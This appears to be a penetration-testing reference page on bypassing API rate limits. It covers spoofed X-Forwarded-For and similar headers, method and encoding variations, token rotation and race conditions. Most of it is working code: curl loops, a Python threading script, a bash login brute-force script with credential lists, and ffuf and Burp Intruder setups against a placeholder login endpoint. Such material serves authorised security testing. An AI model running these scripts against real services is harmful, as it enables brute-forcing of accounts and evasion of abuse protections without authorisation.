# API rate limiting bypass ## What is API Rate Limiting Bypass? API rate limiting bypass exploits weaknesses in how APIs implement traffic throttling and request limiting mechanisms. Rate limits are designed to prevent abuse, brute force attacks, and resource exhaustion, but flawed implementations can be circumvented using various techniques including header manipulation, IP rotation, distributed attacks, and logic bypasses. ## Vulnerable Scenario Example **Normal rate-limited request:** ```http POST /api/login HTTP/1.1 Host: api.target.com Content-Type: application/json {"username": "admin", "password": "wrong1"} # Response after 5 attempts HTTP/1.1 429 Too Many Requests X-RateLimit-Limit: 5 X-RateLimit-Remaining: 0 X-RateLimit-Reset: 300 {"error": "Rate limit exceeded. Try again in 5 minutes."} ``` ## **Bypass using X-Forwarded-For:** ```http POST /api/login HTTP/1.1 Host: api.target.com Content-Type: application/json X-Forwarded-For: 192.168.1.100 {"username": "admin", "password": "wrong6"} # Rate limit bypassed - treated as different IP HTTP/1.1 200 OK ``` **Attack Result:** The API treats the spoofed IP as a new client, allowing continuation of brute force attacks beyond the intended rate limit. ## Common Rate Limiting Bypass Techniques #### IP-Based Bypass Methods **Header Manipulation:** ```http # Try different IP forwarding headers X-Forwarded-For: 10.0.0.1 X-Real-IP: 172.16.0.1 X-Originating-IP: 203.0.113.1 X-Remote-IP: 198.51.100.1 X-Remote-Addr: 192.0.2.1 CF-Connecting-IP: 203.0.113.195 X-Cluster-Client-IP: 198.51.100.178 ``` **Multiple Header Values:** ```http # Test with multiple IPs in single header X-Forwarded-For: 192.168.1.1, 10.0.0.1, 172.16.0.1 # Test with different formats X-Forwarded-For: 192.168.1.1:8080 X-Forwarded-For: [::1] X-Forwarded-For: 999.999.999.999 ``` **IPv6 Bypass:** ```http # Use IPv6 addresses if rate limiting only checks IPv4 X-Forwarded-For: 2001:db8::1 X-Forwarded-For: ::1 X-Forwarded-For: fe80::1 ``` #### User-Agent and Header Rotation **User-Agent Rotation:** ```bash # Rotate User-Agent strings curl -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://api.target.com/login curl -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)" https://api.target.com/login curl -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64)" https://api.target.com/login ``` **Custom Headers:** ```http # Add bypass headers X-Rate-Limit-Bypass: true X-No-Rate-Limit: 1 X-Rate-Limit-Override: admin X-Internal-Request: true ``` #### HTTP Method Variations **Method Override:** ```http # If rate limiting only applies to POST GET /api/login?username=admin&password=test HTTP/1.1 # Method override headers POST /api/login HTTP/1.1 X-HTTP-Method-Override: GET POST /api/login HTTP/1.1 X-HTTP-Method: PUT ``` **Different HTTP Methods:** ```http PUT /api/login HTTP/1.1 PATCH /api/login HTTP/1.1 HEAD /api/login HTTP/1.1 OPTIONS /api/login HTTP/1.1 ``` #### Case Sensitivity and Encoding **URL Case Variations:** ```http POST /api/login HTTP/1.1 POST /API/LOGIN HTTP/1.1 POST /Api/Login HTTP/1.1 POST /api/Login HTTP/1.1 ``` **URL Encoding:** ```http POST /api/login HTTP/1.1 POST /api%2flogin HTTP/1.1 POST /api%2Flogin HTTP/1.1 POST /%61%70%69/login HTTP/1.1 ``` **Double URL Encoding:** ```http POST /%2561%2570%2569/login HTTP/1.1 ``` ## Advanced Bypass Techniques #### Distributed Rate Limit Bypass **Using Burp Intruder:** ``` 1. Capture login request in Burp 2. Send to Intruder 3. Set payload positions: - Username/password (for brute force) - X-Forwarded-For header (for IP rotation) 4. Configure attack type: Pitchfork (to sync payloads) 5. Load IP list and credential list 6. Set delays between requests if needed 7. Start attack monitoring for rate limit responses ``` **Concurrent Requests:** ```bash # Multiple simultaneous requests from different "IPs" for ip in 192.168.1.{1..100}; do curl -H "X-Forwarded-For: $ip" \ -X POST https://api.target.com/login \ -d "username=admin&password=test$ip" & done wait ``` #### Session-Based Bypass **Session Rotation:** ```http # Get new session for each attempt POST /api/login HTTP/1.1 Cookie: sessionid=session1 POST /api/login HTTP/1.1 Cookie: sessionid=session2 POST /api/login HTTP/1.1 # No cookie (new session) ``` **JWT Token Rotation:** ```bash # Generate new JWT for each request for i in {1..100}; do # Get new token token=$(curl -s -X POST https://api.target.com/anonymous-token | jq -r '.token') # Use token for rate-limited endpoint curl -H "Authorization: Bearer $token" \ -X POST https://api.target.com/sensitive-action done ``` #### Content-Type Manipulation **Different Content Types:** ```http # Original JSON request POST /api/login HTTP/1.1 Content-Type: application/json {"username": "admin", "password": "test"} # Try form-encoded POST /api/login HTTP/1.1 Content-Type: application/x-www-form-urlencoded username=admin&password=test # Try XML POST /api/login HTTP/1.1 Content-Type: application/xml admintest ``` #### Race Condition Exploitation **Simultaneous Requests:** ```python import threading import requests def make_request(): response = requests.post('https://api.target.com/login', json={'username': 'admin', 'password': 'test'}) print(f"Status: {response.status_code}") # Send multiple requests simultaneously threads = [] for i in range(50): t = threading.Thread(target=make_request) threads.append(t) t.start() for t in threads: t.join() ``` ## Testing Tools and Techniques #### Burp Suite Rate Limit Testing **Intruder Configuration:** ``` 1. Capture rate-limited request 2. Send to Intruder 3. Configure payloads: - Simple list for bypass headers - Numbers for IP rotation (192.168.1.§1§) - Null payloads for timing tests 4. Set resource pool for concurrent threads 5. Monitor response codes and timing ``` **Custom Burp Extension:** ``` Install extensions for rate limit testing: - Turbo Intruder: High-speed request sending - Rate Limit Bypass: Automated bypass testing - IP Rotate: Automatic IP rotation ``` #### Postman Rate Limit Testing **Collection Setup:** ``` 1. Create collection for rate limit testing 2. Set environment variables: - target_url - current_ip (for X-Forwarded-For) - request_count 3. Pre-request script for IP rotation: // Rotate IP for each request const ips = ['192.168.1.1', '10.0.0.1', '172.16.0.1']; const randomIP = ips[Math.floor(Math.random() * ips.length)]; pm.request.headers.add({ key: 'X-Forwarded-For', value: randomIP }); 4. Use Collection Runner for automation ``` #### Command Line Testing **curl with IP Rotation:** ```bash #!/bin/bash # Rate limit bypass testing script endpoint="https://api.target.com/login" usernames=("admin" "administrator" "root" "user") passwords=("password" "admin" "123456" "password123") # IP ranges for X-Forwarded-For generate_ip() { echo "192.168.$(($RANDOM % 255)).$(($RANDOM % 255))" } # Test rate limit bypass for username in "${usernames[@]}"; do for password in "${passwords[@]}"; do ip=$(generate_ip) response=$(curl -s -w "%{http_code}" \ -H "X-Forwarded-For: $ip" \ -H "X-Real-IP: $ip" \ -X POST "$endpoint" \ -d "username=$username&password=$password") echo "IP: $ip, User: $username, Pass: $password, Response: $response" # Small delay to avoid overwhelming server sleep 0.1 done done ``` **ffuf for Rate Limit Bypass:** ```bash # Test different bypass headers ffuf -u https://api.target.com/login \ -X POST \ -H "Content-Type: application/json" \ -H "X-Forwarded-For: FUZZ" \ -d '{"username":"admin","password":"test"}' \ -w ip_list.txt \ -mc 200,401 \ -t 10 # Test with different User-Agents ffuf -u https://api.target.com/login \ -X POST \ -H "User-Agent: FUZZ" \ -d "username=admin&password=test" \ -w user_agents.txt ``` ## Rate Limit Analysis #### Identifying Rate Limit Mechanisms **Response Analysis:** ```http # Look for rate limit indicators HTTP/1.1 429 Too Many Requests X-RateLimit-Limit: 100 X-RateLimit-Remaining: 0 X-RateLimit-Reset: 1640995200 Retry-After: 300 # Alternative headers X-Rate-Limit-Requests: 100 X-Rate-Limit-Period: 3600 X-Throttle-Limit: 60 ``` **Timing Analysis:** ```bash # Test rate limit timing for i in {1..10}; do start_time=$(date +%s.%N) curl -s https://api.target.com/endpoint > /dev/null end_time=$(date +%s.%N) duration=$(echo "$end_time - $start_time" | bc) echo "Request $i: ${duration}s" done ``` #### Rate Limit Fingerprinting **Different Endpoint Testing:** ```bash # Test if rate limits are per-endpoint or global endpoints=("/api/login" "/api/users" "/api/profile" "/api/search") for endpoint in "${endpoints[@]}"; do echo "Testing $endpoint" for i in {1..20}; do response=$(curl -s -w "%{http_code}" "https://api.target.com$endpoint") echo "Request $i: $response" if [[ "$response" == "429" ]]; then echo "Rate limit hit at request $i for $endpoint" break fi done echo "---" done ``` ## Business Logic Rate Limit Bypass #### Time-Based Bypass **Timezone Manipulation:** ```http # Test if rate limits reset based on different timezones POST /api/endpoint HTTP/1.1 Date: Wed, 21 Oct 2015 07:28:00 GMT POST /api/endpoint HTTP/1.1 Date: Wed, 21 Oct 2015 07:28:00 PST ``` **Clock Skew:** ```http # Send requests with future timestamps POST /api/endpoint HTTP/1.1 Date: Wed, 21 Oct 2025 07:28:00 GMT ``` #### Resource-Based Bypass **Different Resource Requests:** ```http # If rate limit is per-resource, not per-user GET /api/users/1 HTTP/1.1 GET /api/users/2 HTTP/1.1 GET /api/users/3 HTTP/1.1 # Each different user ID might reset the counter ``` **Parameter Variation:** ```http # Test if parameters affect rate limiting POST /api/search HTTP/1.1 {"query": "test1"} POST /api/search HTTP/1.1 {"query": "test2"} POST /api/search HTTP/1.1 {"query": "test3", "filter": "new"} ``` ### Checklist **Basic Tests:** * [ ] Test requests without any bypass techniques (baseline) * [ ] Try different X-Forwarded-For IP addresses * [ ] Test with various User-Agent strings * [ ] Attempt different HTTP methods * [ ] Test URL encoding and case variations **Advanced Tests:** * [ ] Concurrent request testing (race conditions) * [ ] Session/token rotation bypass * [ ] Content-Type manipulation * [ ] Custom header injection * [ ] Distributed attack simulation **Analysis:** * [ ] Document rate limit thresholds and reset times * [ ] Identify which bypass techniques work * [ ] Test rate limits across different endpoints * [ ] Check for global vs. per-endpoint limits * [ ] Verify rate limit consistency